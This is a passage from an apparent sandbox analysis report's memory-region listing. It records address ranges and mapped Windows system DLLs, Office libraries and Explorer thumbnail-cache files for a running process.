0x35fffff 
entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1229 start_va = 0x3600000 end_va = 0x3601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003600000" filename = "" Region: id = 1230 start_va = 0x3610000 end_va = 0x3611fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003610000" filename = "" Region: id = 1231 start_va = 0x3620000 end_va = 0x3623fff entry_point = 0x3620000 region_type = mapped_file name = "prnfldr.dll.mui" filename = "\\Windows\\System32\\en-US\\prnfldr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\prnfldr.dll.mui") Region: id = 1232 start_va = 0x3630000 end_va = 0x366ffff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1233 start_va = 0x3670000 end_va = 0x3680fff entry_point = 0x3670000 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 1234 start_va = 0x3690000 end_va = 0x36cffff entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1235 start_va = 0x36d0000 end_va = 0x370ffff entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 1236 start_va = 0x3710000 end_va = 0x380ffff entry_point = 0x3710000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1237 start_va = 0x3810000 end_va = 0x390ffff entry_point = 0x3810000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\bgc6u8oy 
yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1238 start_va = 0x3910000 end_va = 0x3a0ffff entry_point = 0x3910000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1239 start_va = 0x3a10000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1240 start_va = 0x3c10000 end_va = 0x3c10fff entry_point = 0x3c10000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1241 start_va = 0x3c20000 end_va = 0x3c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c20000" filename = "" Region: id = 1242 start_va = 0x3c30000 end_va = 0x3c30fff entry_point = 0x3c30000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1243 start_va = 0x3c40000 end_va = 0x3c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 1244 start_va = 0x3c80000 end_va = 0x3c80fff entry_point = 0x3c80000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1245 start_va = 0x3c90000 end_va = 0x3c90fff entry_point = 0x0 region_type = 
private name = "private_0x0000000003c90000" filename = "" Region: id = 1246 start_va = 0x3ca0000 end_va = 0x3ca0fff entry_point = 0x3ca0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1247 start_va = 0x3cb0000 end_va = 0x5004fff entry_point = 0x3cb0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1248 start_va = 0x5010000 end_va = 0x5411fff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 1249 start_va = 0x5420000 end_va = 0x5420fff entry_point = 0x5420000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1250 start_va = 0x5430000 end_va = 0x5430fff entry_point = 0x5430000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1251 start_va = 0x54a0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 1252 start_va = 0x5560000 end_va = 0x559ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 1253 start_va = 0x5600000 end_va = 0x560ffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1254 start_va = 0x5630000 end_va = 0x566ffff entry_point = 0x0 
region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 1255 start_va = 0x5670000 end_va = 0x567ffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 1256 start_va = 0x5690000 end_va = 0x56cffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 1257 start_va = 0x5700000 end_va = 0x573ffff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1258 start_va = 0x5770000 end_va = 0x57affff entry_point = 0x0 region_type = private name = "private_0x0000000005770000" filename = "" Region: id = 1259 start_va = 0x57b0000 end_va = 0x57bffff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 1260 start_va = 0x5800000 end_va = 0x583ffff entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1261 start_va = 0x5840000 end_va = 0x58fffff entry_point = 0x5840000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1262 start_va = 0x5940000 end_va = 0x597ffff entry_point = 0x0 region_type = private name = "private_0x0000000005940000" filename = "" Region: id = 1263 start_va = 0x59c0000 end_va = 0x59fffff entry_point = 0x0 region_type = private name = "private_0x00000000059c0000" filename = "" Region: id = 1264 start_va = 0x5a00000 end_va = 0x5a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1265 start_va = 0x5a50000 end_va = 0x5a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a50000" filename = "" Region: id = 1266 start_va = 0x5af0000 end_va = 0x5b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005af0000" filename = "" Region: id = 1267 start_va = 0x5b40000 
end_va = 0x5b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 1268 start_va = 0x5bb0000 end_va = 0x5beffff entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 1269 start_va = 0x5c00000 end_va = 0x5c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1270 start_va = 0x5c40000 end_va = 0x5d3ffff entry_point = 0x5c40000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1271 start_va = 0x5d40000 end_va = 0x5e3ffff entry_point = 0x5d40000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1272 start_va = 0x5e40000 end_va = 0x5f3ffff entry_point = 0x5e40000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1273 start_va = 0x5f40000 end_va = 0x623ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 1274 start_va = 0x6240000 end_va = 0x639ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006240000" filename = "" Region: id = 1275 start_va = 0x6640000 end_va = 0x673ffff entry_point = 0x6640000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: 
"c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1276 start_va = 0x6740000 end_va = 0x683ffff entry_point = 0x6740000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1277 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1278 start_va = 0x6dcf0000 end_va = 0x6dd0afff entry_point = 0x6dcf0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1279 start_va = 0x6dfd0000 end_va = 0x6dfd6fff entry_point = 0x6dfd0000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 1280 start_va = 0x6dfe0000 end_va = 0x6dff3fff entry_point = 0x6dfe0000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1281 start_va = 0x6e000000 end_va = 0x6e007fff entry_point = 0x6e000000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 1282 start_va = 0x6e040000 end_va = 0x6e075fff entry_point = 0x6e040000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1283 start_va = 0x6e080000 end_va = 0x6e28dfff entry_point = 0x6e080000 region_type = mapped_file name = "synccenter.dll" filename = 
"\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1284 start_va = 0x6e2d0000 end_va = 0x6e2d7fff entry_point = 0x6e2d0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1285 start_va = 0x6e2e0000 end_va = 0x6e368fff entry_point = 0x6e2e0000 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 1286 start_va = 0x6e4d0000 end_va = 0x6e4d3fff entry_point = 0x6e4d0000 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1287 start_va = 0x6e4e0000 end_va = 0x6e50ffff entry_point = 0x6e4e0000 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 1288 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1289 start_va = 0x6e670000 end_va = 0x6e807fff entry_point = 0x6e670000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 1290 start_va = 0x6e810000 end_va = 0x6e825fff entry_point = 0x6e810000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 1291 start_va = 0x6ea40000 end_va = 0x6ea97fff entry_point = 0x6ea40000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common 
files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 1292 start_va = 0x6eaa0000 end_va = 0x6eac9fff entry_point = 0x6eaa0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 1293 start_va = 0x6eb70000 end_va = 0x6eb76fff entry_point = 0x6eb70000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 1294 start_va = 0x6eb80000 end_va = 0x6ebe0fff entry_point = 0x6eb80000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1295 start_va = 0x6ebf0000 end_va = 0x6ee67fff entry_point = 0x6ebf0000 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 1296 start_va = 0x6ee70000 end_va = 0x6ee78fff entry_point = 0x6ee70000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 1297 start_va = 0x6ee80000 end_va = 0x6eeadfff entry_point = 0x6ee80000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1298 start_va = 0x6eed0000 end_va = 0x6ef20fff entry_point = 0x6eed0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1299 start_va = 0x6f020000 end_va = 0x6f06dfff entry_point = 0x6f020000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1300 start_va = 0x6f070000 end_va = 0x6f0e7fff entry_point = 0x6f070000 region_type = mapped_file name = 
"timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 1301 start_va = 0x6f0f0000 end_va = 0x6f18ffff entry_point = 0x6f0f0000 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 1302 start_va = 0x6f530000 end_va = 0x6f589fff entry_point = 0x6f530000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1303 start_va = 0x6fe00000 end_va = 0x6fe05fff entry_point = 0x6fe00000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 1304 start_va = 0x6fe10000 end_va = 0x6fe7ffff entry_point = 0x6fe10000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 1305 start_va = 0x6fe80000 end_va = 0x6fe8afff entry_point = 0x6fe80000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1306 start_va = 0x6fe90000 end_va = 0x6fe98fff entry_point = 0x6fe90000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 1307 start_va = 0x6fea0000 end_va = 0x6ff09fff entry_point = 0x6fea0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 1308 start_va = 0x6ff10000 end_va = 0x6ff40fff entry_point = 0x6ff10000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: 
id = 1309 start_va = 0x6ff50000 end_va = 0x707c7fff entry_point = 0x6ff50000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office15\\1033\\grooveintlresource.dll") Region: id = 1310 start_va = 0x707d0000 end_va = 0x70ccffff entry_point = 0x707d0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 1311 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 1312 start_va = 0x70f10000 end_va = 0x70f35fff entry_point = 0x70f10000 region_type = mapped_file name = "atl100.dll" filename = "\\Windows\\System32\\atl100.dll" (normalized: "c:\\windows\\system32\\atl100.dll") Region: id = 1313 start_va = 0x70f40000 end_va = 0x70fa8fff entry_point = 0x70f40000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 1314 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 1315 start_va = 0x71070000 end_va = 0x71216fff entry_point = 0x71070000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office15\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office15\\grooveex.dll") Region: id = 1316 start_va = 0x71220000 end_va = 0x7126bfff entry_point = 0x71220000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") 
Region: id = 1317 start_va = 0x71270000 end_va = 0x713defff entry_point = 0x71270000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 1318 start_va = 0x71ba0000 end_va = 0x71bcdfff entry_point = 0x71ba0000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 1319 start_va = 0x72320000 end_va = 0x72402fff entry_point = 0x72320000 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 1320 start_va = 0x72410000 end_va = 0x72449fff entry_point = 0x72410000 region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 1321 start_va = 0x72450000 end_va = 0x72521fff entry_point = 0x72450000 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 1322 start_va = 0x72530000 end_va = 0x7255afff entry_point = 0x72530000 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 1323 start_va = 0x72560000 end_va = 0x725aefff entry_point = 0x72560000 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 1324 start_va = 0x725b0000 end_va = 0x72613fff entry_point = 0x725b0000 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 1325 start_va = 0x72620000 end_va = 0x726d9fff entry_point = 0x72620000 region_type = mapped_file name = "actioncenter.dll" filename = 
"\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1326 start_va = 0x726e0000 end_va = 0x7271bfff entry_point = 0x726e0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 1327 start_va = 0x72720000 end_va = 0x727cffff entry_point = 0x72720000 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 1328 start_va = 0x727d0000 end_va = 0x7281cfff entry_point = 0x727d0000 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 1329 start_va = 0x72820000 end_va = 0x72844fff entry_point = 0x72820000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 1330 start_va = 0x72850000 end_va = 0x7287dfff entry_point = 0x72850000 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 1331 start_va = 0x72880000 end_va = 0x728c7fff entry_point = 0x72880000 region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 1332 start_va = 0x728d0000 end_va = 0x728e5fff entry_point = 0x728d0000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 1333 start_va = 0x728f0000 end_va = 0x728f9fff entry_point = 0x728f0000 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1334 start_va = 0x72900000 end_va = 0x72905fff entry_point = 
0x72900000 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 1335 start_va = 0x72ae0000 end_va = 0x72af6fff entry_point = 0x72ae0000 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 1336 start_va = 0x72b00000 end_va = 0x72cadfff entry_point = 0x72b00000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1337 start_va = 0x72cb0000 end_va = 0x72cdafff entry_point = 0x72cb0000 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 1338 start_va = 0x72ce0000 end_va = 0x72cfcfff entry_point = 0x72ce0000 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 1339 start_va = 0x72d00000 end_va = 0x72f64fff entry_point = 0x72d00000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1340 start_va = 0x72f70000 end_va = 0x72fd3fff entry_point = 0x72f70000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1341 start_va = 0x72fe0000 end_va = 0x73043fff entry_point = 0x72fe0000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1342 start_va = 0x73250000 end_va = 0x73261fff entry_point = 0x73250000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: 
"c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1343 start_va = 0x73270000 end_va = 0x7327cfff entry_point = 0x73270000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1344 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1345 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1346 start_va = 0x73410000 end_va = 0x73456fff entry_point = 0x73410000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1347 start_va = 0x73460000 end_va = 0x73469fff entry_point = 0x73460000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1348 start_va = 0x73490000 end_va = 0x734a3fff entry_point = 0x73490000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1349 start_va = 0x734e0000 end_va = 0x734effff entry_point = 0x734e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1350 start_va = 0x735d0000 end_va = 0x7364cfff entry_point = 0x735d0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1351 start_va = 0x73730000 end_va = 0x73736fff entry_point = 0x73730000 region_type = mapped_file name = "avrt.dll" filename = 
"\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1352 start_va = 0x73740000 end_va = 0x73764fff entry_point = 0x73740000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1353 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1354 start_va = 0x73830000 end_va = 0x7383dfff entry_point = 0x73830000 region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 1355 start_va = 0x73840000 end_va = 0x73847fff entry_point = 0x73840000 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 1356 start_va = 0x73850000 end_va = 0x73906fff entry_point = 0x73850000 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 1357 start_va = 0x73910000 end_va = 0x73949fff entry_point = 0x73910000 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 1358 start_va = 0x73950000 end_va = 0x7395efff entry_point = 0x73950000 region_type = mapped_file name = "samcli.dll" filename 